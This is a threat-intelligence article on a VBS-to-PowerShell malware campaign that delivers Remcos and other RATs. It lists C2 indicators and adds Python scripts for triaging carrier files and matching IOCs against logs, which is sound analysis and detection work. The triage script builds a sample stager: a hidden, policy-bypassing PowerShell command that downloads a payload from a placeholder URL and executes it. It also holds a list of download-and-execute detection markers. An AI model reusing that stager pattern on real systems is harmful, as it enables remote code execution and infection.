New Sophisticated Multi-Stage Malware Campaign Uses VBS Files to Execute PowerShell Script

A recently uncovered malware campaign has revealed a highly sophisticated, multi-stage infection process utilizing heavily obfuscated Visual Basic Script (VBS) files to deploy remote access trojans (RATs) such as Remcos, LimeRAT, DCRat, and AsyncRAT.

Discovered across a cluster of 16 open directories on various hosts, this campaign relies on a file named “sostener.vbs” (Spanish for “sustain”) as a key component of its initial payload.

Discovery of a Complex Malware Deployment System

The intricate design of this malware delivery system, which involves a three-stage process of obfuscation, dynamic script generation, and remote payload downloads, highlights the evolving tactics of modern cyber threats.

[Figure: result of the deobfuscation, the PowerShell script recovered from the VBS]

Researchers have noted potential ties to APT-C-36 (Blind Eagle), a Colombian threat actor known for similar techniques, though definitive attribution remains unconfirmed.

The malware operates through a meticulously crafted three-stage process. In the first stage, the obfuscated VBScript, often found in files like “sostener.vbs”, decodes a Base64-encoded payload and dynamically generates a PowerShell script in memory.

This script, forming the second stage, acts as a stager that reaches out to remote services to download additional malicious components.

These components are often hidden in unconventional locations, such as JPEG images on the Internet Archive or text files on hosting services like paste[.]ee and gofile[.]io.

[Figure: JPEG containing base64-encoded malware stored on archive[.]org]

Technical Breakdown of the Three-Stage Attack

The downloaded elements include a memory injector and the final RAT payload. In the third stage, the injector loads the RAT, primarily Remcos but also variants such as LimeRAT and DCRat, into memory for execution, granting the attackers persistent remote access to the compromised system.
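The first two stages described above (a Base64 blob inside a VBS that turns into a PowerShell stager, and a Base64 payload riding inside a JPEG) are the parts an analyst can triage offline. The script below is an added example, not the campaign's code or anything recovered from sostener.vbs: it pulls long Base64 runs out of a script, decodes them (handling the UTF-16LE encoding that PowerShell's -EncodedCommand expects), flags download-and-execute markers, and carves a Base64 payload appended after a JPEG's End-Of-Image marker. The VBS, the archive.org URL and the "PE" bytes are constructed stand-ins.

```python
"""Stage-1/stage-2 triage helpers for VBS -> PowerShell -> image-carrier chains.

Added example, not the campaign's own code. It reproduces only the technique
the article describes on constructed samples built at the bottom of the file.
"""
from __future__ import annotations

import base64
import re

# A run of Base64 characters this long is a payload, not an ordinary token.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Strings that, in a decoded stager, usually mean "download and execute".
MARKERS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadData",
    "FromBase64String", "Net.WebClient", "archive.org", "paste.ee",
    "gofile.io", "duckdns.org",
)

JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"


def find_base64_blobs(data: bytes) -> list[bytes]:
    """Return every Base64-looking run in the data, in file order."""
    return [m.group(0) for m in B64_RUN.finditer(data)]


def decode_blob(blob: bytes) -> bytes | None:
    """Decode one run, repairing stripped '=' padding; None if not valid Base64."""
    padded = blob + b"=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except ValueError:
        return None


def bytes_to_text(raw: bytes) -> str:
    """UTF-16LE when every odd byte is zero (PowerShell -EncodedCommand), else UTF-8."""
    if len(raw) >= 4 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def markers_in(text: str) -> list[str]:
    lowered = text.lower()
    return [m for m in MARKERS if m.lower() in lowered]


def triage_vbs(vbs: bytes) -> list[dict]:
    """Stage 1: decode every Base64 run in a script and flag embedded stagers."""
    hits = []
    for blob in find_base64_blobs(vbs):
        raw = decode_blob(blob)
        if raw is None:
            continue
        text = bytes_to_text(raw)
        hits.append({"decoded": text, "markers": markers_in(text)})
    return hits


def extract_from_jpeg(img: bytes) -> bytes | None:
    """Stage 2: carve a Base64 payload appended after a JPEG's End-Of-Image marker.

    Falls back to scanning the whole file, because a carrier can also hide the
    blob inside a comment segment instead of after EOI.
    """
    if not img.startswith(JPEG_SOI):
        return None
    eoi = img.rfind(JPEG_EOI)
    regions = [img[eoi + 2:]] if eoi != -1 else []
    regions.append(img)
    for region in regions:
        for blob in find_base64_blobs(region):
            raw = decode_blob(blob)
            if raw:
                return raw
    return None


# --- constructed samples (not real campaign artefacts) ----------------------
# Hypothetical stager: the URL and item name are placeholders, not real IOCs.
STAGER = (
    "$u='https://archive.org/download/example-item/photo.jpg';"
    "$d=(New-Object Net.WebClient).DownloadString($u);"
    "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))"
)
# -EncodedCommand takes UTF-16LE Base64, so the dropper encodes it that way.
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_VBS = (
    'Dim sh\r\nSet sh = CreateObject("WScript.Shell")\r\n'
    f'sh.Run "powershell -w hidden -ep bypass -enc {ENCODED_STAGER}", 0, False\r\n'
).encode()

# Fake "PE": an MZ header plus filler, enough to test carving and detection.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 32
SAMPLE_JPEG = (
    JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xdb\x00\x43\x00" + bytes(range(64)) + JPEG_EOI
    + base64.b64encode(FAKE_PE)
)

if __name__ == "__main__":
    for hit in triage_vbs(SAMPLE_VBS):
        print("stager markers:", hit["markers"])
    payload = extract_from_jpeg(SAMPLE_JPEG)
    print("carved payload starts with MZ:", payload is not None and payload[:2] == b"MZ")
```

On a real sample the decoded stager is the thing to read: it names the hosting service and the next URL, which is where the JPEG or paste text comes from, so the same two functions can be chained by hand across the stages.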

The command-and-control (C2) infrastructure for these RATs predominantly uses “duckdns[.]org” dynamic DNS hostnames, which let the operators re-point a name to a new IP address as listeners move (so the hostname, not the IP, is the durable indicator), with specific domains like “rem25rem[.]duckdns[.]org” and “sosten38999[.]duckdns[.]org” tied to active listeners on rotating IPs.

The campaign’s sophistication is further evident in its use of shared infrastructure, with overlapping C2 servers and TLS certificate fingerprints linking multiple RAT variants to the same threat actors.

For instance, IP addresses like 186[.]169.80.199 and 193[.]23.3.29 have been observed hosting Remcos listeners, while others, such as 213[.]209.150.22, support DCRat operations.

Additionally, an accidental exposure of a personal email (“[email protected]”) in a Bitbucket repository commit log offers a rare glimpse into the potential identity behind the campaign, though this remains unverified.

This malware deployment system, likely the final stage of a broader spearphishing effort, underscores the importance of monitoring open directories and obfuscated scripts to detect such threats early.

Indicators of Compromise (IOCs)

Type                Indicator
DNS                 remc21[.]duckdns[.]org, sosten38999[.]duckdns[.]org
DNS                 rem25rem[.]duckdns[.]org, trabajonuevos[.]duckdns[.]org
DNS                 gotemburgoxm[.]duckdns[.]org, dcupdate[.]duckdns[.]org
DNS                 dgflex[.]duckdns[.]org, purelogs2025[.]duckdns[.]org
DNS                 romanovas[.]duckdns[.]org
TLS Fingerprint     95f61fba6418c812c4c62d0c7ee4c8e5c369fc76e044cab6de3b6ddf787db2ed (SHA-256)
RAT Hash            d8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5 (SHA-256)
Host                186[.]169.80.199:1515, 213[.]209.150.22:55140
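Because the C2 hostnames rotate through dynamic DNS, the useful detection is a name match that also catches subdomains, backed by the TLS certificate fingerprint and the listener endpoints for when a resolver log is not available. The script below is an added example, not part of the original write-up: it parses the IOC table exactly as published (still defanged, with the type labels shortened), refangs it, and matches it against constructed JSON log lines loosely modelled on a network sensor's dns, ssl, conn and files output. The log lines and the 10.0.0.x clients are made up; only the indicator values come from the table.

```python
"""Match the article's IOC table against constructed network log lines.

Added example, not part of the original write-up. Log lines are constructed;
only the indicator values are taken from the article's table.
"""
from __future__ import annotations

import json

# Indicators as published (defanged); type labels shortened for parsing.
IOC_TABLE = """
DNS remc21[.]duckdns[.]org, sosten38999[.]duckdns[.]org
DNS rem25rem[.]duckdns[.]org, trabajonuevos[.]duckdns[.]org
DNS gotemburgoxm[.]duckdns[.]org, dcupdate[.]duckdns[.]org
DNS dgflex[.]duckdns[.]org, purelogs2025[.]duckdns[.]org
DNS romanovas[.]duckdns[.]org
TLS 95f61fba6418c812c4c62d0c7ee4c8e5c369fc76e044cab6de3b6ddf787db2ed
HASH d8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5
HOST 186[.]169.80.199:1515, 213[.]209.150.22:55140
"""


def refang(s: str) -> str:
    """Undo the usual defanging so indicators compare against live log values."""
    return s.replace("[.]", ".").replace("hxxp", "http")


def parse_ioc_table(table: str) -> dict[str, set]:
    iocs: dict[str, set] = {"dns": set(), "tls": set(), "hash": set(), "host": set()}
    for line in table.strip().splitlines():
        kind, _, rest = line.partition(" ")
        for item in rest.split(","):
            item = refang(item.strip().lower())
            if kind == "HOST":
                ip, _, port = item.partition(":")
                iocs["host"].add((ip, int(port)))  # endpoint = (ip, port) pair
            else:
                iocs[kind.lower()].add(item)
    return iocs


def domain_hits(name: str, domains: set[str]) -> list[str]:
    """Exact or subdomain match, so a.rem25rem.duckdns.org still fires."""
    name = name.lower().rstrip(".")
    return [d for d in domains if name == d or name.endswith("." + d)]


def match_record(rec: dict, iocs: dict) -> list[tuple[str, str]]:
    """Return (ioc_type, ioc_value) pairs that one parsed log record matches."""
    hits: list[tuple[str, str]] = []
    path = rec.get("_path")
    if path == "dns":
        hits += [("dns", d) for d in domain_hits(rec.get("query", ""), iocs["dns"])]
    elif path == "ssl":
        # SNI carries the duckdns name even when the resolver log is missing.
        hits += [("dns", d) for d in domain_hits(rec.get("server_name", ""), iocs["dns"])]
        hits += [("tls", fp.lower()) for fp in rec.get("cert_sha256", [])
                 if fp.lower() in iocs["tls"]]
    elif path == "conn":
        ep = (rec.get("id.resp_h"), rec.get("id.resp_p"))
        if ep in iocs["host"]:
            hits.append(("host", f"{ep[0]}:{ep[1]}"))
    elif path == "files":
        h = rec.get("sha256", "").lower()
        if h in iocs["hash"]:
            hits.append(("hash", h))
    return hits


def scan(lines: list[str], iocs: dict) -> list[dict]:
    """Run every JSON log line through match_record and collect alerts."""
    alerts = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        rec = json.loads(line)
        for kind, value in match_record(rec, iocs):
            alerts.append({"line": n, "path": rec["_path"], "kind": kind, "ioc": value})
    return alerts


# Constructed log lines (JSON, one record per line); hosts 10.0.0.x are fictional.
SAMPLE_LOG = [
    '{"_path":"dns","ts":1,"id.orig_h":"10.0.0.5","query":"rem25rem.duckdns.org","answers":["186.169.80.199"]}',
    '{"_path":"conn","ts":2,"id.orig_h":"10.0.0.5","id.resp_h":"186.169.80.199","id.resp_p":1515,"proto":"tcp"}',
    '{"_path":"ssl","ts":3,"id.orig_h":"10.0.0.5","server_name":"dcupdate.duckdns.org",'
    '"cert_sha256":["95f61fba6418c812c4c62d0c7ee4c8e5c369fc76e044cab6de3b6ddf787db2ed"]}',
    '{"_path":"conn","ts":4,"id.orig_h":"10.0.0.7","id.resp_h":"213.209.150.22","id.resp_p":55140,"proto":"tcp"}',
    '{"_path":"files","ts":5,"sha256":"d8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5"}',
    '{"_path":"dns","ts":6,"id.orig_h":"10.0.0.9","query":"www.example.com","answers":["93.184.216.34"]}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG, parse_ioc_table(IOC_TABLE)):
        print(alert)
```

The endpoint and file-hash matches are the brittle ones: the article notes the listeners sit on rotating IPs, and a repacked RAT changes its hash, so treat a bare (ip, port) or hash miss as inconclusive and the duckdns name or certificate fingerprint as the stronger signal.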
